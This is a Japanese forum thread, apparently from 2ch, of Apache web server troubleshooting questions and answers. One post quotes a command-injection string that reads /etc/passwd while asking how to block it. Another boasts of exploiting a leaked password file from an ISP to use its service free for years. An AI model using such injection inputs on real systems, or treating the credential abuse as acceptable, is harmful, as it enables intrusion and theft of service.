2009/11/14(土) 05:26:50IPv6からしかアクセスできないようにしたいのかもしれないだろ。
0314名無しさん@お腹いっぱい。
2009/11/14(土) 08:46:430315名無しさん@お腹いっぱい。
2009/11/14(土) 08:49:22iprouteでのアクセスを遮断したい、という質問だろ。
0316名無しさん@お腹いっぱい。
2009/11/14(土) 09:52:05もちろん。IPv4だけにしたいのかもしれない。当人に聞いてみろ。
0317名無しさん@お腹いっぱい。
2009/11/18(水) 03:23:16移植がんばれ
0318名無しさん@お腹いっぱい。
2009/11/28(土) 13:07:02AddType text/x-server-parsed-html .html
を追加したのですが、すると
http://www.mysite.com/
でindex.htmlにアクセスしたとき、ファイルを保存のダイアログが出てしまいます。
(IE6.0です)
なにか回避方法はないでしょうか?
0319名無しさん@お腹いっぱい。
2009/11/28(土) 13:08:53アクセスしてみたけどダイアログ出なかったよ?
0320名無しさん@お腹いっぱい。
2009/12/02(水) 06:16:35<Directory "/home/">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Directory>
しかしこれだと、JPGなどの画像ファイルにはアクセスされてしまいます。
これを、画像ファイルだけ遮断させて、HTMLは表示させるということはできないでしょうか?
<Files ~ "\.(gif|png|jpg)$
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これを試してみましたが、機能しませんでした。
0321320
2009/12/02(水) 06:59:47Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これにしたらいけました
お騒がせしてすいません
0322名無しさん@お腹いっぱい。
2009/12/04(金) 17:49:510323名無しさん@お腹いっぱい。
2009/12/07(月) 12:05:33ライセンス翻訳には「要求するのは、ユーザーがそのソフトウェアに Apache License のコードが使われていることを知らせる文言を入れることだけである」
とあり、使用ライブラリ名の明記までは書かれていないので、
複数使用していても、
製品マニュアルに「Apache License 2.0のライブラリを使用しています。」と、載せておけばよいのでしょうか?
翻訳だけではライセンスの満たし方がわかりにくいので、その辺わかりやすく解説しているサイト等もありましたら、
教えていただけないでしょうか?
0324名無しさん@お腹いっぱい。
2009/12/14(月) 12:44:44わたしのサーバで、/var/www/htmlのWEB公開用ディレクトリにconfが置いてあるみたいなのですが、大丈夫でしょうか。
confにはifcfg-eth0など、ネットワーク関連の設定ファイルが入っています。
このディレクトリにconfをおいた覚えはないのですが、何かのバグですか?
もしくはクラッキングされてしまったのでしょうか。
OSはCentOS5.3です。
0325名無しさん@お腹いっぱい。
2009/12/14(月) 13:18:020326名無しさん@お腹いっぱい。
2009/12/14(月) 13:27:460327名無しさん@お腹いっぱい。
2009/12/19(土) 12:20:180328名無しさん@お腹いっぱい。
2009/12/24(木) 21:19:46それで思い出した。
もう10年以上も前だけど、むかしベッコアメってプロバイダがあってね
そのホームページスペースに自分がアップロードした覚えのないファイルが突如出現したりしてたんだ
ファイル名はcoreなんだけど、当時はcoreの意味がわからなくて、気味悪いからとりあえずFTPでダウンロードしてHEXDUMPしてみたら
中身が/etc/passwordでひっくり返ったことがあった。
サポートに電話してもよくわかないというから、じゃあ自分の持ち物扱いなんだなということで
まぁ、あまりヘンな自慢はできないしアレだけど、その日から数年間ネットの通信料はタダで生活できました。
0329名無しさん@お腹いっぱい。
2009/12/24(木) 23:21:480330名無しさん@お腹いっぱい。
2009/12/25(金) 01:03:03父性にアクセスしてない気もするが(w
0331名無しさん@お腹いっぱい。
2010/01/06(水) 07:15:59apache2.2を動かしていて、perl v5.10.0でプログラムを書いていますがうまく動きません。
具体的には、
http://www.stackasterisk.jp/tech/program/perl04_02.jsp
に書いてある★Dにsleep 10;を書くと、すぐにブラウザが開放されず、
10秒ほど読み込み中の状態になります。
Windowsを使っているのが悪いのでしょうか?
UNIX板の皆さんの意見をお聞かせ下さい。
0332名無しさん@お腹いっぱい。
2010/01/06(水) 08:03:30板違い。
http://pc11.2ch.net/php/
0333名無しさん@お腹いっぱい。
2010/01/06(水) 09:01:08ご指摘どうもです。そちらの板の
perlスレで聞くことにしました。
0334名無しさん@お腹いっぱい。
2010/01/20(水) 22:43:02時々リファラに複数のURIが併記されたものがあります。例えば今さっき来たヤツですが、
http://yellowinphotograph.net/apage/22875.php,
http://www.stephenblog.com/?p=867,
http://210.24.175.20:880/xoops/modules/newbb/viewtopic.php?post_id=19749,
http://astinweddingordinators.com/2009/12/15/2010-wedding-trends.aspx,
http://sumissionword.com/submit-link/, http://www.mah.on.ca/Page7030.aspx,
http://www.doctorconsult.com.ar/en/component/artforms/?formid=2,
http://bridsmajor.blog128.fc2.com/blog-entry-15.html, http://austincar.co.cc/addjob.php,
http://travelguide.blog.com/travel_leisure/cruises/italy-the-heaven-of-parmesan-and-ham/,
http://travelguide.blog.com/travel_leisure/asia/indonesia/bali/visit-india-travel-by-visit-tnt-new-report-on-travel-in-india/,
http://ho.hoorku.com/index.php?option=com_adsmanager&page=write_ad&catid=7&Itemid=0,
http://job.co.cc/addjob.php
みたいな具合。これは一体何なんですか?
## 上記のすべての URI は、実際のログから取得した文字列に手を入れてあります。
## また長過ぎる行があると言われて跳ねられるので URI の区切れ目で改行しています。
0335名無しさん@お腹いっぱい。
2010/01/20(水) 23:15:180336名無しさん@お腹いっぱい。
2010/01/21(木) 00:00:280337名無しさん@お腹いっぱい。
2010/01/21(木) 03:34:30いずれにせよあんまり気にしてもしょうがないと思う。
0338名無しさん@お腹いっぱい。
2010/01/21(木) 06:43:520339名無しさん@お腹いっぱい。
2010/01/21(木) 08:47:110340名無しさん@お腹いっぱい。
2010/01/21(木) 09:43:51SEOとは何を略した言葉で何を意味するのかわかっていれば
そんなことは言えないと思うんだ
0341名無しさん@お腹いっぱい。
2010/01/21(木) 13:11:38cgi-binの下に dat/ と subject.txt を置くと error.log に
attempt to invoke directory as script: C:/xampp/cgi-bin/○○○/
と出てしまいますが、httpd.conf の書き方が間違っているんでしょうか?
それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
教えてください。
0342341
2010/01/21(木) 13:24:29http://navi2ch.sourceforge.net/log/
0343341
2010/01/21(木) 13:28:13<Directory c:/xampp/cgi-bin/○○○/>
Options Indexes
Order allow,deny
Allow from all
</Directory>
0344名無しさん@お腹いっぱい。
2010/01/21(木) 13:31:15これは単にファイルが置いてあるだけだよ。
CGIとか関係ない。
0345名無しさん@お腹いっぱい。
2010/01/21(木) 13:33:16> それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
はい。
0346341
2010/01/21(木) 13:40:11それは分っているのですが、ファイル収集のためにcgiを書ました。
>>345
そうなんんですか!? 2chもてっきりそうなってると思ってたんですが、
よくみると2chのスレのURLにはcgi-binって入ってませんね。。。
monazilla とかで2chがどうなっているか聞いたほうがいいんでしょうか。
0347名無しさん@お腹いっぱい。
2010/01/21(木) 13:44:592chでも
http://pc12.2ch.net/unix/subject.txt
http://pc12.2ch.net/unix/dat/1222729860.dat
とかはただ置いてあるだけ。
CGIは経由していない。
ファイル収集はまた別の話。区別しろ。
0349341
2010/01/21(木) 16:49:48どうもありがとうございました。
0350334
2010/01/22(金) 01:42:03もしかしたら、と思って自分の blog で弾かれている trackback のリストと apache のログを照合すると、
そのまんまピッタリでした。というわけで、なんかトラックバック・スパム?みたいなもののようです。
実害は無いので無視しておくことにします。
0351名無しさん@お腹いっぱい。
2010/01/28(木) 17:37:41zfsでのサルベージ方法教えろ。
0352名無しさん@お腹いっぱい。
2010/01/28(木) 19:50:450353名無しさん@お腹いっぱい。
2010/02/02(火) 03:27:250354名無しさん@お腹いっぱい。
2010/02/26(金) 18:40:21起動中のApacheのMPMがPreforkかWorkerかのどちらであるか調べるコマンドありますか?
Apache 2.0系です。
0355名無しさん@お腹いっぱい。
2010/02/26(金) 20:43:36環境がわからないけどこんな感じ
apachectl -V
apache2ctl -V
0356名無しさん@お腹いっぱい。
2010/02/27(土) 02:00:21それと同じバイナリファイルから起動されたものであるの
保証がなかったりするから100%ではないような。
0357名無しさん@お腹いっぱい。
2010/02/27(土) 02:31:42最近の鯖はCPUはやくてメモリーもたくさん詰めるから
httpd複数立てたほうが効率的だったりするんだよね
ServerLimitとかMaxClientsの上限低すぎるとおもうなー
動画配信とかで1プロセスあたりコネクトしてる時間が異様に長い子沢山なサーバってどういうMax/Limit設定にしてるんだろ?
0358名無しさん@お腹いっぱい。
2010/02/27(土) 13:42:24Apache Server Informationとか
0359名無しさん@お腹いっぱい。
2010/02/27(土) 14:48:320360名無しさん@お腹いっぱい。
2010/02/27(土) 14:51:13<IfModule mpm_prefork_module>
<IfModule mpm_worker_module>
SetEnvIf
0361名無しさん@お腹いっぱい。
2010/02/27(土) 19:00:330362名無しさん@お腹いっぱい。
2010/03/01(月) 01:28:32あと、TeXとかEmacsみたいに任意のプロセスイメージを実行ファイルに
ダンプしてくれるコマンドがあったから、それでダンプして-Vとか。
0363名無しさん@お腹いっぱい。
2010/03/24(水) 19:42:200364名無しさん@お腹いっぱい。
2010/03/25(木) 04:35:58http://abt-archi.com/manual/programs/htpasswd.html#restrictions
「:」がイリーガルキャラクタ
255文字以下であること
あと、AuthName は文字コードを渡せないから日本語だとブラウザによって文字化けする
0365名無しさん@お腹いっぱい。
2010/04/05(月) 09:40:25ログファイルのオーナーがrootになっています。
User apache
Group apache
として、デーモンはapacheユーザで走らせているのに関わらずです。
何故このような動作をするのでしょうか?
0366名無しさん@お腹いっぱい。
2010/04/05(月) 10:50:120367名無しさん@お腹いっぱい。
2010/04/09(金) 16:36:25だいぶバグも取れてきたので、VPSを借りて公開してみようかと思っています。
そこで質問なんですが、公開する場合、やはりApacheの設定とかってかなり
セキュリティを意識してやらないといけないでしょうか?
家のテストサーバーはCentOSの入門書に書いてあった通り、とりあえずCGIを
使えるように設定しただけなんですが、この程度の知識でVPSでCGIプログラム
を公開するのは無謀ですか?
またお勧めのサイトや書籍等も教えてください。 よろ
0368名無しさん@お腹いっぱい。
2010/04/09(金) 16:41:580369367
2010/04/09(金) 16:48:01すみません>>367の質問はApacheの設定についての質問の
つもりなんですが・・・
Linux板にApacheスレが見つからなかったもんで・・・
0370名無しさん@お腹いっぱい。
2010/04/09(金) 16:58:13「Linuxの話はLinux板で」という返しは年寄りスレで。
0371名無しさん@お腹いっぱい。
2010/04/09(金) 16:59:35くだ質スレでいいよ。
0373名無しさん@お腹いっぱい。
2010/04/09(金) 19:57:36http://pc11.2ch.net/hosting/
0374名無しさん@お腹いっぱい。
2010/05/09(日) 10:40:41更新日時が送られません。
更新日時を送るようにするにはどうしたらよいものでしょうか?
0375名無しさん@お腹いっぱい。
2010/06/13(日) 22:55:01`cat /etc/passwd`;とか
system("/usr/bin/foo");
とかユーザがコマンドを実行できないようにするには
どう対処すればいいでしょうか?
0376名無しさん@お腹いっぱい。
2010/06/18(金) 04:01:400377名無しさん@お腹いっぱい。
2010/06/18(金) 07:15:55友人の鯖で、cssが遅いです。
Fedora12
apache 2.2.15
GET hoge.css
をすると、
?/p?$???E??稟@?@??凄w?1??P狒9??LP ?s??HTTP/1.1 200 OK
Date: Wed, 16 Jun 2010 22:00:12 GMT
Server: Apache/2.2.15
1行目が文字化けの余計なレスポンスが
結局cssは適用されるんだけど、読み込むまでに15秒とか掛かっています。
mime.type と 文字コードの確認はしました。
後考えられる原因は何があるでしょうか?
宜しければ教えて下さい。お願い致します。
0378名無しさん@お腹いっぱい。
2010/06/26(土) 18:48:52http://aaaa.net/uploda/img/aaaa989141.jpg
のように置き換えるにはどうしたらいいでしょうか?
↓
http://aaaa.net/uploda/index.php?=98914
0379名無しさん@お腹いっぱい。
2010/07/08(木) 15:33:52小学生レベルだな
RewriteRule ^/uploda/img/aaa(.*)\.jpg /uploda/index.php?=$1
0380名無しさん@そうだ選挙に行こう
2010/07/10(土) 06:09:140382名無しさん@そうだ選挙に行こう
2010/07/11(日) 09:09:43俺も見たとき思ったw
>>378
これ変換前後が逆じゃね?
0383名無しさん@そうだ選挙に行こう
2010/07/11(日) 15:04:36↓
http://aaaa.net/uploda/index.php?=98914
RewriteRule ^/uploda/img/aaaa(.*)\.jpg /uploda/index.php?=$1
*********************
http://aaaa.net/uploda/index.php?=98914
↓
http://aaaa.net/uploda/img/aaaa989141.jpg
RewriteRule ^/uploda/img/index.php?=(.*) /uploda/img/aaaa$1.jpg
かな?
0384名無しさん@そうだ選挙に行こう
2010/07/11(日) 18:53:170385名無しさん@そうだ選挙に行こう
2010/07/11(日) 19:00:260386名無しさん@そうだ選挙に行こう
2010/07/11(日) 22:01:420387名無しさん@お腹いっぱい。
2010/07/12(月) 07:29:27そろそろ正解を。
0388名無しさん@お腹いっぱい。
2010/07/12(月) 09:56:28つまり画像ファイルへ直リンされたときはcgi経由のURLに自動的に戻し
アダルト広告を表示させたい、とあなたはそう仰っているわけですね?(キリッ
0389名無しさん@お腹いっぱい。
2010/07/12(月) 13:43:18わざわざ出てきて、無知な素人だと必死でアピールしなくても良いぞ。
素人は引っ込んでろよ。www
0390名無しさん@お腹いっぱい。
2010/07/12(月) 18:33:350391名無しさん@お腹いっぱい。
2010/07/13(火) 22:23:12書けないんだっけ?
マニュアルだけ見ると、できなさそうな
感じなんだけど…。
0392名無しさん@お腹いっぱい。
2010/07/13(火) 22:30:030393名無しさん@お腹いっぱい。
2010/07/14(水) 13:00:49どうして?
書けるなら書こうと思ったんだけど。
サイト別にアクセス制限したくて。
0394名無しさん@お腹いっぱい。
2010/07/14(水) 16:23:33無限ループ
0395名無しさん@お腹いっぱい。
2010/07/14(水) 19:10:59もうひとこえ!
0396名無しさん@お腹いっぱい。
2010/07/14(水) 19:17:13こわくね?
0397名無しさん@お腹いっぱい。
2010/07/14(水) 19:25:580398名無しさん@お腹いっぱい。
2010/07/14(水) 23:33:06トップレベルとかVirtualHost内(サーバーコンテキスト)に書くほうがはるかに簡単
0399名無しさん@お腹いっぱい。
2010/07/20(火) 01:02:03今は2.2を使ってるけど
0400名無しさん@お腹いっぱい。
2010/07/20(火) 12:46:260401名無しさん@お腹いっぱい。
2010/07/21(水) 18:51:48そりゃあそうなんだけど。
>サイト別にアクセス制限したくて。
とか書きにくいところが困りもの。
トップレベルとVirtualHostセクションは
一回しか書けないんで、記述の
整理がやりにくい。
0402名無しさん@お腹いっぱい。
2010/08/04(水) 23:58:52そのあと以下を見て viewvc をインストールしました。
http://d.hatena.ne.jp/yaakaito/20090105/1231163794
現在、http://example.jp/cgi-bin/viewvc.cgi とアクセスすると
自分の Subversion リポジトリを見ることが出来ます。
質問:
/cgi-bin/viewvc.cgi にアクセスが来たときだけBasic認証を掛けたい。
/cgi-bin/hoge.cgi など、viewvc.cgi 以外の cgi にアクセスが来たときは、
これまで通り認証は掛けたくない。
これを実現するにはどのように httpd.conf を書けばいいでしょうか?
0403名無しさん@お腹いっぱい。
2010/08/05(木) 00:00:22/etc/apache2/sites-available/default は以下のようになっていて
(apt で apache をインストールした直後)
「ここから追記した」というブロックを追記した後、
http://example.jp/cgi-bin/viewvc.cgi にアクセスしても認証ダイアログが出ませんでした。
<Directory "/usr/lib/cgi-bin"> のところで AllowOverride None しているから?
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>
0404名無しさん@お腹いっぱい。
2010/08/05(木) 00:00:40ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory> ←ここまで apt でインストールしたときのままの状態
<Directory "/usr/lib/cgi-bin/viewvc.cgi"> ←ここから追記した
AuthType Basic
AuthName "Subversion Repository"
AuthUserFile /etc/apache2/hoge.passwd
require valid-user
</Directory>
〜
0405名無しさん@お腹いっぱい。
2010/08/05(木) 02:55:09Files
0406名無しさん@お腹いっぱい。
2010/08/28(土) 16:13:56んで、mod_wsgiをインストールしようとしたのですが、Pythonを--without-thread指定しないとコンパイルが通りません。
--without-threadを付けてPythonをインストール後、mod_wsgiをインストールしようとすると、PythonのThredを有効にしてインストールしろと怒られます。
何か解決方法はありますか…?orz
0407名無しさん@お腹いっぱい。
2010/08/28(土) 16:28:210408名無しさん@お腹いっぱい。
2010/08/28(土) 18:04:200409406
2010/08/28(土) 21:14:25FreeBSD8.0, Apache2.2.16, PHP5.3, MySQL5.1, Python2.7, mod_wsgi3.3 で動きました。
あー、うん、うん、うん…。orz
0410378
2010/09/19(日) 03:41:24フレッツ光ネクスト回線1本
ルーターは使わずPPPoEで接続しています。
で今使っているプロバイダ1社
これをもう1社追加して、マルチセクション(http://www.daifukuya.com/photoxp/archives/pppoe-multi-session.html)で
自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、
サーバー側の設定としてどうしたらいいでしょうか?
どうぞよろしくお願いしますm(__)m
0411名無しさん@お腹いっぱい。
2010/09/19(日) 07:35:130412410
2010/09/19(日) 08:22:56分かる方いらっしゃいましたらお願いしますm(__)m
0413名無しさん@お腹いっぱい。
2010/09/19(日) 08:35:51IPベースのバーチャルホストを使う
0414名無しさん@お腹いっぱい。
2010/09/19(日) 08:37:20apache あんまり関係ない...
OS のポリシールーティング+αや
ブロードバンドルータならNATで
別ポートで動かした apache 2つにつなげればいいんじゃね
0415名無しさん@お腹いっぱい。
2010/09/19(日) 08:38:580416名無しさん@お腹いっぱい。
2010/09/19(日) 08:40:38サーバマシンでってことで。
ついでに、サーバマシンに2IP ふれば
ルーターかましててもIPベースだけで
ことが足りるのかな
0417名無しさん@お腹いっぱい。
2010/09/19(日) 08:53:46その辺は工夫が必要だ。たとえばiptableで固定のIPアドレスに転送するとか、
設定ファイルを動的に書き換えるようにするとか。
0419Perl忍者 ◆M5ZWRnXOj6
2010/09/26(日) 17:54:29... waiting .[Sun Sep 26 17:52:00 2010] [warn] module perl_module is already loaded, skipping
これは読み込まれてるのわかってる
他の場所でよみこまれてる
ここで再読み込みしてる
LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so
<IfModule mod_perl.c>
AddHandler perl-script .cgi
PerlHandler ModPerl::Registry
PerlSendHeader On
</IfModule>
だけど
#LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so
でコメントアウトして
ENVのSERVER_SOFTWAREみても
SERVER_SOFTWARE:Apache/2.2.14 (Ubuntu)
ってだけ
mod_perlってでない 読み込まれてちゃんとロードされてるのにmod_perl
なんでSERVER_SOFTWARE二表示されない おしえて
0420Perl忍者 ◆M5ZWRnXOj6
2010/09/26(日) 17:57:240421名無しさん@お腹いっぱい。
2010/09/26(日) 18:39:140422Perl忍者 ◆M5ZWRnXOj6
2010/09/26(日) 20:01:11無駄にわけやがってファイルきもい
conf.d/securityにかかないときかなかった
0423名無しさん@お腹いっぱい。
2010/11/14(日) 18:08:47今ログは
isp.example.com - - [14/Nov/2010:18:05:25 +0900] "GET /foo.htm HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
のような形式なのですが、
GET /foo.htm ではなく GET http://example.net/foo.htm
のようにドメインまで表示するようにするには
どうすればいいのでしょうか?
0424名無しさん@お腹いっぱい。
2010/11/14(日) 23:16:29よく嫁
http://httpd.apache.org/docs/2.2/mod/mod_log_config.html#formats
0425名無しさん@お腹いっぱい。
2010/11/15(月) 02:14:16ありがとうございます
0426名無しさん@お腹いっぱい。
2010/12/15(水) 13:52:06apr_pallocが確保したメモリは初期化されていない → memcpy(NULL文字コピーされず)
0427名無しさん@お腹いっぱい。
2010/12/15(水) 14:06:330428名無しさん@お腹いっぱい。
2010/12/17(金) 17:46:15これだけで、超初心者とわかるから報告しなくて良いよ。
> NULL文字列
更笑
0429名無しさん@お腹いっぱい。
2010/12/19(日) 13:48:050430名無しさん@お腹いっぱい。
2010/12/19(日) 14:51:28用途が違う
0431名無しさん@お腹いっぱい。
2010/12/19(日) 18:26:06kwsk
0432名無しさん@お腹いっぱい。
2010/12/19(日) 18:31:09少しはググれよ
0433名無しさん@お腹いっぱい。
2010/12/20(月) 09:27:500434名無しさん@お腹いっぱい。
2010/12/21(火) 02:35:23レイヤー
0435名無しさん@お腹いっぱい。
2010/12/21(火) 04:07:450436名無しさん@お腹いっぱい。
2010/12/22(水) 05:10:02冗長化や負荷分散に関してほとんど知識がない人ということだから、推奨するとすればmod_proxyのほうでしょう
もっといえばmod_proxyを使いこなすのは難しいでしょうから、おすすめとしてはpoundです
0437名無しさん@お腹いっぱい。
2010/12/22(水) 10:18:510438名無しさん@お腹いっぱい。
2010/12/22(水) 10:25:200439名無しさん@お腹いっぱい。
2011/01/20(木) 23:46:47httpd.confで
PythonHandler test
にして、test.pyを動かしているのですが、このようにファイル名をいちいち指定しないで動かすにはどうしたらいいでしょうか?
0440名無しさん@お腹いっぱい。
2011/01/21(金) 02:50:340441名無しさん@お腹いっぱい。
2011/01/23(日) 18:47:18Apacheのaccess_logの見方についてですが、以下の304はなんと表現するのが正しいのでしょうか?
xxx.xxx.xxx.xxx - test [23/Jan/2011:18:16:15 +0900] "GET /test.css HTTP/1.1" 304 -
順番に
アクセスしてきた相手のIPアドレス
認証があった場合に使用されたユーザID
アクセスされたサーバ時刻
GETはリクエストヘッダー、GET方式での呼び出し
/test.cssはファイル名、
HTTP/1.1はプロトコルバージョン
304は・・・??
よろしくお願いします。
0442名無しさん@お腹いっぱい。
2011/01/23(日) 18:51:470443名無しさん@お腹いっぱい。
2011/01/23(日) 18:54:14例えば304のかわりに200で後ろが-でなく数値があれば、リクエスト通って、実際に送出したデータ量(バイト)
という認識でOKですよね。自己解決しました
0444名無しさん@お腹いっぱい。
2011/01/23(日) 18:57:130445名無しさん@お腹いっぱい。
2011/01/24(月) 11:51:23そうなんですよ。
0446名無しさん@お腹いっぱい。
2011/02/11(金) 12:16:180447名無しさん@お腹いっぱい。
2011/03/17(木) 18:20:00.70再起動したあとにIPアドレスが変わり名前と違うようになるみたいで
apacheが立ち上がったときに https だけがこけています。(httpはOK)
その後落ち着いてから apache を再起動すると https もうまく起動します。
これを最初から https もこけずに起動できるようにするにはどうすればよいでしょうか。
0448名無しさん@お腹いっぱい。
2011/03/17(木) 18:35:59.290449名無しさん@お腹いっぱい。
2011/03/17(木) 18:37:38.430450名無しさん@お腹いっぱい。
2011/03/17(木) 18:52:24.060451名無しさん@お腹いっぱい。
2011/03/17(木) 18:53:23.39Apacheはその固定アドレス:443をListenさせるとかw
IPv6はどう対処させようか。
サーバなのにtempaddrで運用するってのもアレだけどw
0452名無しさん@お腹いっぱい。
2011/03/17(木) 18:54:54.930453447
2011/03/17(木) 19:07:02.360454名無しさん@お腹いっぱい。
2011/03/24(木) 00:54:18.21【2ch激論】ダム板が統合・廃止へ!人気スレ「また騙されてダム板に…」がなくなる?
http://kamome.2ch.net/test/read.cgi/river/1299720645/
0455名無しさん@お腹いっぱい。
2011/04/23(土) 20:14:19.39ログにそのユーザ名が記録されていたんだけど
2.2系に変更したら失敗時は"-"と記録されるようになった。
2.2でも1.3のようにログすることってできないかな?
0456名無しさん@お腹いっぱい。
2011/04/25(月) 01:52:04.73マジで?そうだとすると、マニュアルに書いてあることが間違ってるね
http://httpd.apache.org/docs/2.2/mod/mod_log_config.html
>リモートユーザ (認証によるもの。ステータス (%s) が 401 のときは意味がないものである可能性がある)
0457名無しさん@お腹いっぱい。
2011/04/25(月) 21:21:40.24ユーザにプロンプトが出る前に一回 401 が返るけどそのログと見間違えてる?
mod_log_config.c の log_remote_user を見ても、- になるのは NULL のときだよ。
0458名無しさん@お腹いっぱい。
2011/04/25(月) 22:55:22.44うん、マニュアルと一致しなくておかしいなぁ、と思ってた。
>>457
う〜ん、なんでだろう。見間違いはないんだけよね。
でもうち以外では挙動が違うってのはうれしい情報。
もうちょっと調べてみる。
0459名無しさん@お腹いっぱい。
2011/05/10(火) 12:06:13.87apacheのプロセス番号からアクセスしているURLを調べることってできますでしょうか?
ご教示いただけると幸いです。
0460名無しさん@お腹いっぱい。
2011/05/10(火) 12:28:09.560461名無しさん@お腹いっぱい。
2011/05/10(火) 23:43:44.840462 忍法帖【Lv=4,xxxP】
2011/05/17(火) 13:18:40.00のように、ローカルの絶対パスで指定ってできないんでしょうか?
環境httpdバージョン2.2
0463名無しさん@お腹いっぱい。
2011/05/17(火) 13:23:28.770464名無しさん@お腹いっぱい。
2011/05/17(火) 13:24:02.24http://httpd.apache.org/docs/2.2/ja/mod/core.html#errordocument
0465名無しさん@お腹いっぱい。
2011/05/17(火) 23:46:14.18先に
Alias /404.html /usr/home/foo/bar/404.html
すればよくね?
0466 忍法帖【Lv=4,xxxP】
2011/05/18(水) 05:00:26.65そうやるしかなさそうですね。ありがとございます。
0467名無しさん@お腹いっぱい。
2011/05/22(日) 23:13:08.31モジュール内部でgetpidとrequest_recみてやればいい。
0468名無しさん@お腹いっぱい。
2011/05/25(水) 15:58:06.65マルチポストすみません。
以下の設定が前提です。
■ ディレクトリ構成(一部抜粋)
/var/www/hoge
/var/www/hoge/hage
/var/www/hoge/hage/hige
■ httpd.conf(一部抜粋)
DocumentRoot /var/www/html
Alias /hage /var/www/hoge/hage
<Directory "/var/www/hoge/hage">
SSLRequireSSL
ErrorDocument 403 "SSL Require -> https://"
AllowOverride All
Order allow,deny
Allow from all
</Directory>
【やりたいこと】
ディレクトリ /hage「だけ」に SSL をかけたいです。
【こまっていること】
上記設定ですと、/hage/hige にも SSL がかかってしまいます。
/hage にだけ SSL をかけることはできますでしょうか?
(そもそもの設定が間違っている可能性大ですが)
よろしくお願いいたします。
0469名無しさん@お腹いっぱい。
2011/05/25(水) 16:04:36.040470名無しさん@お腹いっぱい。
2011/05/27(金) 21:19:19.24一番上に書いたものにマッチするそうですが、これを拒否する方法はありますか?
0471名無しさん@お腹いっぱい。
2011/05/27(金) 21:34:58.880472名無しさん@お腹いっぱい。
2011/05/31(火) 11:34:45.66/home/test/admin/test.cgi というファイルがあってこのtest.cgiを
実行させたいんですが、以下のようにすると client denied by server
configuration で動きません。
<VirtualHost 123.123.123.123:80>
DocumentRoot /home/test/public_html
ServerName www.test.com
ScriptAlias /ugoke/ "/home/test/admin/"
</VirtualHost>
/home/test/public_html/test.cgi に置くと問題なく動くんですが
ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?
Apache1.3系だと上のような設定で動いているんですが・・・
今は2.0.64です。
0473名無しさん@お腹いっぱい。
2011/05/31(火) 11:42:53.97そんなことはない。注意事項がマニュアルに書いてある。
マニュアルも読まない奴はサーバー管理しちゃいけないというトラップ。
0474名無しさん@お腹いっぱい。
2011/05/31(火) 12:38:12.94ありがつ。
0475名無しさん@お腹いっぱい。
2011/06/02(木) 20:11:56.10ググっても何も出てこないよ
0476 忍法帖【Lv=3,xxxP】
2011/06/03(金) 15:35:07.410477名無しさん@お腹いっぱい。
2011/06/03(金) 23:19:38.090478240
2011/06/04(土) 13:40:48.27____
/ \
/ _ノ ヽ、_ \
/ o゚⌒ ⌒゚o \ 今日もまた、
| (__人__) | /usr/local/apache2/bin/apachctl start
\ ` ⌒´ / を打ち間違える仕事が始まったお…
0479名無しさん@お腹いっぱい。
2011/06/04(土) 21:06:20.75HTMLで記述してもうまく動かないからサーバーの方に問題があるのかと思いまして・・・
0480名無しさん@お腹いっぱい。
2011/06/05(日) 00:33:34.280481名無しさん@お腹いっぱい。
2011/06/06(月) 20:24:12.23「Sub-process /usr/bin/dpkg returned an error code」
と出てしまいます。
どうしたら再インストール出来るか教えてください。
0482名無しさん@お腹いっぱい。
2011/06/06(月) 20:28:52.630483名無しさん@お腹いっぱい。
2011/06/06(月) 20:41:33.541から設定しなおすのが大変なので他にないでしょうか?
0484名無しさん@お腹いっぱい。
2011/06/06(月) 21:12:18.110485名無しさん@お腹いっぱい。
2011/06/06(月) 23:00:39.100486名無しさん@お腹いっぱい。
2011/06/08(水) 21:01:28.15ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか?
0487名無しさん@お腹いっぱい。
2011/06/10(金) 06:07:56.31その an error code がなんなのかわからないと答えようがないと思うが。
0488名無しさん@お腹いっぱい。
2011/06/10(金) 11:27:48.640489名無しさん@お腹いっぱい。
2011/06/16(木) 04:07:49.48Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。
===
worker.list=wlb
worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2
worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable
worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===
w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか?
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。
環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30
よろしくお願いいたします。
0490名無しさん@お腹いっぱい。
2011/06/22(水) 22:02:32.13http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz
誰かミラー知ってる人いませんか?
0491名無しさん@お腹いっぱい。
2011/06/24(金) 18:13:00.70違ってると思うけど、mod_extract_forwarded ではダメ?・・・だよね
0492名無しさん@お腹いっぱい。
2011/06/24(金) 18:50:42.93ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/mod_rpaf-0.6.tar.gz
0493名無しさん@お腹いっぱい。
2011/06/25(土) 10:20:58.370494名無しさん@お腹いっぱい。
